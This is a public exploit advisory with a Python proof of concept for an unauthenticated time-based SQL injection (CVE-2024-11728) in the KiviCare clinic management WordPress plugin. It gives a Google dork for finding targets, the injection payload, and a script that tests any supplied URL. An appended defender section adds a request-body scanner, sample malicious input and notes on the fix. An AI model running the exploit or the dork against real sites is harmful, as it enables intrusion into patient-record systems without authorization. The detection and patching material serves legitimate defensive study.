# Exploit Title: KiviCare Clinic & Patient Management System (EHR) 3.6.4 - Unauthenticated SQL Injection
# Google Dork: inurl:"/wp-content/plugins/kivicare-clinic-management-system/
# Date: 11/12/2024
# Exploit Author: Samet "samogod" Gözet
# Vendor Homepage: wordpress.org
# Software Link: https://wordpress.org/plugins/kivicare-clinic-management-system/
# Version: < 3.6.5
# Tested on: Ubuntu 22.04
# CVE : CVE-2024-11728

#!/usr/bin/env python3
"""
CVE-2024-11728 - KiviCare WordPress Plugin Unauthenticated SQL Injection PoC
Author: samogod.samet.g

Description:
    Proof of Concept for Unauthenticated SQL Injection vulnerability in KiviCare
    WordPress Plugin <= 3.6.4. The vulnerability exists in the tax_calculated_data
    AJAX action where the visit_type[service_id] parameter is insufficiently
    escaped, allowing SQL injection attacks.

Usage:
    python3 CVE-2024-11728.py -u <target_url> [-t <timeout>] [-v]
"""

import argparse
import requests
import sys
import time
from urllib3.exceptions import InsecureRequestWarning

# Disable SSL warnings
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)


class KiviCareExploit:
    def __init__(self, url, timeout=10, verbose=False):
        self.url = url.rstrip('/')
        self.timeout = timeout
        self.verbose = verbose
        self.target = f"{self.url}/wp-admin/admin-ajax.php"
        self.headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': '*/*'
        }

    def log(self, message, level="info"):
        """Custom logging function"""
        colors = {
            "info": "\033[94m[*]",
            "success": "\033[92m[+]",
            "error": "\033[91m[-]",
            "warning": "\033[93m[!]"
        }
        print(f"{colors.get(level, '[*]')} {message}\033[0m")

    def verify_vulnerability(self):
        """Verify if the target is vulnerable using a time-based SQL injection"""
        self.log("Testing vulnerability with time-based SQL injection...")

        data = {
            'action': 'ajax_post',
            'route_name': 'tax_calculated_data',
            'clinic_id[id]': '1',
            'doctor_id[id]': '1',
            'visit_type[0][service_id]': "123) AND (SELECT * FROM (SELECT(SLEEP(5)))alias) AND (1=1",
            '_ajax_nonce': '5d77fc94cf'  # You need to update this nonce value
        }

        try:
            # Baseline request with a plain numeric service_id, used to compare timings
            normal_data = {
                'action': 'ajax_post',
                'route_name': 'tax_calculated_data',
                'clinic_id[id]': '1',
                'doctor_id[id]': '1',
                'visit_type[0][service_id]': "1",
                '_ajax_nonce': '5d77fc94cf'  # You need to update this nonce value
            }

            start_time = time.time()
            normal_response = requests.post(
                self.target,
                data=normal_data,
                headers=self.headers,
                verify=False,
                timeout=self.timeout
            )
            normal_time = time.time() - start_time

            if self.verbose:
                self.log(f"Normal request time: {normal_time:.2f} seconds", "info")
                self.log(f"Normal response: {normal_response.text}", "info")

            start_time = time.time()
            try:
                response = requests.post(
                    self.target,
                    data=data,
                    headers=self.headers,
                    verify=False,
                    timeout=self.timeout
                )
                elapsed_time = time.time() - start_time

                if self.verbose:
                    self.log(f"Injection request time: {elapsed_time:.2f} seconds", "info")
                    self.log(f"Request data: {data}", "info")

                if elapsed_time >= 4.5:
                    self.log("Target appears to be vulnerable!", "success")
                    return True
                else:
                    self.log("Target does not appear to be vulnerable.", "warning")
                    return False

            except requests.exceptions.Timeout:
                self.log("Request timed out - target is vulnerable!", "success")
                return True

        except requests.exceptions.RequestException as e:
            self.log(f"Error during vulnerability check: {str(e)}", "error")
            return False


def main():
    parser = argparse.ArgumentParser(
        description='KiviCare WordPress Plugin Unauthenticated SQL Injection PoC (CVE-2024-11728)')
    parser.add_argument('-u', '--url', required=True, help='Target URL (e.g., http://example.com)')
    parser.add_argument('-t', '--timeout', type=int, default=10, help='Request timeout in seconds')
    parser.add_argument('-v', '--verbose', action='store_true', help='Enable verbose output')
    args = parser.parse_args()

    print("""
CVE-2024-11728 - KiviCare WordPress Plugin Unauthenticated SQL Injection
Author: samogod.samet.g
""")

    exploit = KiviCareExploit(args.url, args.timeout, args.verbose)
    exploit.verify_vulnerability()


if __name__ == '__main__':
    main()
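Added example, not part of the original advisory or of the KiviCare plugin: a defender-side check for the request shape the PoC describes. The plugin's tax_calculated_data route expects numeric service ids, so a web-application firewall rule, a log-review script or a test in the plugin's own CI can treat any request to admin-ajax.php that routes to that action with a non-integer visit_type[<n>][service_id] value as malformed input worth alerting on. The field names (action, route_name, visit_type[..][service_id]) are taken from the PoC above; the sample request bodies, client addresses and nonce values are constructed for this demonstration.

```python
# Added example (not from the advisory or the plugin): flag admin-ajax requests
# to the KiviCare tax_calculated_data route whose service_id values are not
# plain positive integers. Sample traffic below is constructed.
import re
from urllib.parse import parse_qsl

# Matches visit_type[0][service_id], visit_type[12][service_id], ...
SERVICE_ID_KEY = re.compile(r"^visit_type\[\d+\]\[service_id\]$")
# What a legitimate service id looks like: digits only, no leading zero
POSITIVE_INT = re.compile(r"^[1-9]\d*$")


def suspicious_service_ids(body: str) -> list:
    """Parse an application/x-www-form-urlencoded POST body and return the
    (key, value) pairs of service_id fields that are not positive integers.
    Only requests routed to ajax_post / tax_calculated_data are inspected;
    an empty list means the body looks like ordinary plugin traffic."""
    params = dict(parse_qsl(body, keep_blank_values=True))
    if params.get("action") != "ajax_post" or params.get("route_name") != "tax_calculated_data":
        return []
    return [(k, v) for k, v in params.items()
            if SERVICE_ID_KEY.match(k) and not POSITIVE_INT.match(v.strip())]


def scan_bodies(bodies):
    """Scan (client_ip, body) tuples and return one alert dict per suspicious request."""
    alerts = []
    for client_ip, body in bodies:
        hits = suspicious_service_ids(body)
        if hits:
            alerts.append({"client_ip": client_ip, "fields": hits})
    return alerts


# Constructed sample traffic (hypothetical addresses and nonces):
#  - a legitimate tax calculation with service_id=7
#  - the same route with a non-numeric service_id that closes the SQL parenthesis
#  - an unrelated admin-ajax action that must not trigger
SAMPLE_BODIES = [
    ("10.0.0.5",
     "action=ajax_post&route_name=tax_calculated_data&clinic_id[id]=1&doctor_id[id]=1"
     "&visit_type[0][service_id]=7&_ajax_nonce=deadbeef00"),
    ("198.51.100.23",
     "action=ajax_post&route_name=tax_calculated_data&clinic_id[id]=1&doctor_id[id]=1"
     "&visit_type[0][service_id]=7)+AND+(1%3D1&_ajax_nonce=deadbeef00"),
    ("10.0.0.9", "action=heartbeat&_nonce=deadbeef00"),
]

if __name__ == "__main__":
    for alert in scan_bodies(SAMPLE_BODIES):
        print(f"[!] {alert['client_ip']}: {alert['fields']}")
```

The same integer test is the shape of the fix inside the plugin: a service id should be cast to an integer, or bound through $wpdb->prepare() with a %d placeholder, before it reaches the query, so that a value such as the one in the second sample never becomes part of SQL text. The script above only parses bodies it is handed; feeding it live traffic means exporting POST bodies from a reverse proxy or WAF, since standard web-server access logs do not record them.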